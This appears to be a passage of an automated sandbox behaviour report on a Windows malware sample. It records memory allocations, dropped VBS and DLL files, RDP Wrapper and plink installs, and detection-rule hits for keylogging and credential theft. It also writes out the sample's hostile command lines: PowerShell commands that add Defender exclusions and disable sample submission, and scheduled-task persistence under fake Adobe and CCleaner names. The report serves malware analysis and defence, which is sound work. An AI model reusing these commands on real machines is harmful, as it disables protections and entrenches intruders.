heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72512000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71ed1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71ed2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a10000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00862000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00895000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0089b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00897000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0087c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70e2a000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00886000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0088a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00887000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e0af000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0086a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dfb1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0088b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0087a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0088c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74351000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74331000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76b61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x77ab1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74321000
process_handle: 0xffffffff
1 0 0
description RegAsm.exe tried to sleep 143 seconds, actually delayed analysis time by 143 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 10899365888
root_path: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafajomdciknnfnhlbmonkdhhcfgcdhn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafajomdciknnfnhlbmonkdhhcfgcdhn\3844\background.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafajomdciknnfnhlbmonkdhhcfgcdhn\3844\manifest.json
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafajomdciknnfnhlbmonkdhhcfgcdhn\10.9_0\manifest.json
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafajomdciknnfnhlbmonkdhhcfgcdhn\3844\icon.png
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Preferences
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafajomdciknnfnhlbmonkdhhcfgcdhn\3844\background.js
file C:\Users\test22\AppData\Roaming\KGYyvQq\1164.vbs
file C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com
file C:\Users\test22\AppData\Roaming\KGYyvQq\335.vbs
file C:\Program Files\RDP Wrapper\rdpwrap.dll
file C:\Users\test22\AppData\Roaming\plink.exe
file C:\Users\test22\AppData\Roaming\KGYyvQq\722.vbs
file C:\Users\test22\AppData\Roaming\KGYyvQq\tbgUJlYNtm.bat
file C:\Users\test22\AppData\Roaming\KGYyvQq\195.vbs
file C:\Program Files\RDP Wrapper\RDPWInst.exe
file C:\Users\test22\AppData\Roaming\KGYyvQq\13.vbs
file C:\Users\test22\AppData\Roaming\KGYyvQq\947.vbs
file C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Vacillavo.exe.com
file C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com
file C:\Program Files\RDP Wrapper\rdpwrap.bat
file C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll
file C:\Users\test22\AppData\Roaming\KGYyvQq\552.vbs
file C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\1164.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\947.vbs
cmdline C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" 2>nul
cmdline C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
cmdline C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\335.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\947.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll"
cmdline C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "AdobeGCInvoker-1.0-MicrosoftAccount65"
cmdline C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
cmdline powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
cmdline powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
cmdline C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\13.vbs" ENWbXBorgA hKztsHIGxo "C:\Users\test22\AppData\Roaming\KGYyvQq\552.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\KfPhiDQW.bat" "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll"
cmdline schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "AdobeGCInvoker-1.0-MicrosoftAccount65"
cmdline wmic group where sid="S-1-5-32-555" get name /value
cmdline C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC87"
cmdline "C:\Windows\System32\cmd.exe" /c cmd < Orlo.vst
cmdline C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
cmdline C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\195.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\722.vbs" "VlROR2NsQlZWazlXTWtwWlVXMDVlVm93UlcxVWF6bERXWG94YjFNemNEQmpNR2hLVWpOb2RrcHJlREphV0VaM1pETmpPV1Y2Clp6Qk9WVkpHVW10V1EweFVTWGhQVkZGMENrNUVXVEpTUXpGRFRVVk5kMHhVUmtaUFJVNUZUVlZaZWsxRVRUQlJXREE5" "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll"
cmdline powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
cmdline schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC87"
cmdline schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC19"
cmdline C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
cmdline wmic group where sid="S-1-5-32-544" get name /value
cmdline C:\Windows\system32\cmd.exe /c "C:\Users\test22\AppData\Roaming\KGYyvQq\tbgUJlYNtm.bat ENWbXBorgA hKztsHIGxo"
cmdline powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
cmdline C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC19"
cmdline C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
file C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com
file C:\Program Files\RDP Wrapper\RDPWInst.exe
file C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com
file C:\Users\test22\AppData\Roaming\plink.exe
wmi SELECT Name FROM Win32_Group WHERE sid="S-1-5-32-544"
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /c cmd < Orlo.vst
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x000000fc
process_name: smss.exe
process_identifier: 228
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: csrss.exe
process_identifier: 308
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: csrss.exe
process_identifier: 368
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: winlogon.exe
process_identifier: 412
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: services.exe
process_identifier: 448
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: lsm.exe
process_identifier: 472
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: svchost.exe
process_identifier: 584
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: svchost.exe
process_identifier: 660
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: svchost.exe
process_identifier: 736
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: svchost.exe
process_identifier: 820
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: svchost.exe
process_identifier: 852
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: audiodg.exe
process_identifier: 912
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: svchost.exe
process_identifier: 1004
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: svchost.exe
process_identifier: 1072
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: taskhost.exe
process_identifier: 1140
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: dwm.exe
process_identifier: 1204
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: explorer.exe
process_identifier: 1236
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: svchost.exe
process_identifier: 1432
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: IMEDICTUPDATE.EXE
process_identifier: 1476
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: svchost.exe
process_identifier: 1844
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: pw.exe
process_identifier: 1996
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: SearchIndexer.exe
process_identifier: 748
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: taskeng.exe
process_identifier: 2932
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: svchost.exe
process_identifier: 2196
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: pw.exe
process_identifier: 300
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: taskhost.exe
process_identifier: 2616
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: SearchProtocolHost.exe
process_identifier: 2576
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: SearchFilterHost.exe
process_identifier: 2328
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: Pensai.exe.com
process_identifier: 2312
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: Vacillavo.exe.com
process_identifier: 2912
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: svchost.exe
process_identifier: 2080
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: RegAsm.exe
process_identifier: 1852
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: Vacillavo.exe.com
process_identifier: 1376
1 1 0

Process32NextW

 snapshot_handle: 0x000000fc
process_name: Pensai.exe.com
process_identifier: 2648
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
section {u'size_of_data': u'0x000b6000', u'virtual_address': u'0x00020000', u'entropy': 7.684871776112975, u'name': u'.rsrc', u'virtual_size': u'0x000b5e2c'} entropy 7.68487177611 description A section with a high entropy has been found
entropy 0.877108433735 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url http://purl.org/rss/1.0/
url http://www.passport.com
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Hijack network configuration rule Hijack_Network
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Install itself for autorun at Windows startup rule Persistence
description Escalate priviledges rule Escalate_priviledges
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Escalate priviledges rule Escalate_priviledges
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2440
process_handle: 0x00000384
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2440
process_handle: 0x00000384
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2496
process_handle: 0x00000380
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2496
process_handle: 0x00000380
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 1428
process_handle: 0x000002a0
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 1428
process_handle: 0x000002a0
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2632
process_handle: 0x0000026c
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2632
process_handle: 0x0000026c
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 732
process_handle: 0x00000388
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 732
process_handle: 0x00000388
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 1516
process_handle: 0x00000374
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 1516
process_handle: 0x00000374
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2792
process_handle: 0x00000104
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2792
process_handle: 0x00000104
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2320
process_handle: 0x000002f8
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2320
process_handle: 0x000002f8
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2320
process_handle: 0x00000314
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2320
process_handle: 0x00000314
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3160
process_handle: 0x000000f8
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3160
process_handle: 0x000000f8
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3304
process_handle: 0x000002a4
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3304
process_handle: 0x000002a4
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3452
process_handle: 0x000002bc
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3452
process_handle: 0x000002bc
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3652
process_handle: 0x00000388
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3652
process_handle: 0x00000388
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3716
process_handle: 0x000002c0
0 0

NtTerminateProcess

